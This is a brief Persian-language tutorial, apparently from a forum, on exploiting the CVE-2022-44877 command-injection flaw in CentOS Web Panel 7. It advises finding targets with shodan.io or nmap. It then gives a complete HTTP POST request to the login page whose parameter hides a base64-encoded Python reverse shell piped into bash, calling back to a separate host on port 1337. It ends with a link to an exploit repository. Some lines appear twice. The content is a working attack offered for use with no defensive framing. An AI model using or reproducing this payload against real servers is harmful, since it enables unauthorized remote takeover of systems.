آموزش آسیب پذیری موجود در Centos Web Panel نسخه 7 با شماره CVE-2022-44877
برای شناسایی میتوانید از وب سایت هایی مانند shodan.io یا ابزار nmap استفاده کنید.
پس از شناسایی و تایید آسیب پذیری موجود دستورات مورد نظر را مانند نمونه زیر به آدرس پنل POST نمایید.
توضیحات تکمیلی :
برای شناسایی میتوانید از وب سایت هایی مانند shodan.io یا ابزار nmap استفاده کنید.
پس از شناسایی و تایید آسیب پذیری موجود دستورات مورد نظر را مانند نمونه زیر به آدرس پنل POST نمایید.
کد:
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcn Qgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0 KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy 5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAy KHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKT tvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5 LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1 Host: 10.13.37.10:2031 Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1ea upietdk82 Content-Length: 40 Origin: https://10.13.37.10:2031 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: https://10.13.37.10:2031/login/index.php?login=failed Accept-Encoding: gzip, deflate Accept-Language: en Connection: close username=root&password=toor&commit=Login
توضیحات تکمیلی :
کد:
https://github.com/numanturle/CVE-2022-44877